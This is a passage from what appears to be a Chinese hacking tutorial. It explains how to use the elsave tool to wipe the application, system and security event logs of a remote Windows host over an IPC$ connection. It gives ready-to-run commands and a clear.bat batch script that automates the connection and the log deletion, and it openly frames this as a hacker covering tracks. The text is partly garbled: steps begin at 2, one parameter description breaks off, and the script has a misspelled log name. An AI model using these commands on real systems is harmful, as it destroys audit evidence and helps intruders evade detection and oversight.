日志清除工具elsave的使用

8.3.1 日志清除工具elsave的使用
无论是本地还是远程清除日志，都可以使用elsave工具来完成。elsave是个清除日志的程序，其作用是远程删除事件查看器中的相关的日志。
其命令格式为：
[pre]elsave [-s\\server] [-l log] [-F file] [-C] [-q] [/pre]
其中各个参数的含义如下。
-s\\server：指定远程计算机。
-llog：指定日志类型，其中参数"application"为应用程序日志，参数"system"为系统日志，参数"security"为服务器用IPC$进行连接。
步骤2：在本地命令提示符窗口中分别输入如下命令，即可删除远程计算机中的日志文件。
清除应用程序日志命令：elsave-s\\192.168.0.45-lapplication-C。
清除系统日志命令：elsave-s\\192.168.0.45-lsystem-C。
清除安全日志命令：elsave-s\\192.168.0.45-lsecurity-C。
步骤3：在本地命令提示符窗口中输入"netuse\\192.168.0.45\ipc$/del"命令，即可断开IPC$连接。这样黑客便成功地删除了远程主机中的事件日志。
步骤4：另外，也可以编写一个批处理文件clear.bat，具体的内容如下：
[pre]net use \\%1\ipc$ %3 /user:%2 elsave -s \\%1 -l "application" -C elsave -s \\%1 -l "system" -C elsave -s \\%1 -l "securtity" -C net use \\%1\ipc$ /del [/pre]
步骤5：把该文件存储到和elsave.exe文件相同的文件夹下之后，在命令提示符窗口中运行"Clear.bat192.168.0.45Susan"""命令，即可清除远程计算机的日志记录。
批处理每次能处理的变量从%0～%9共10个，其中，%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值。同理，%2～%9指输入的第2～第9个值。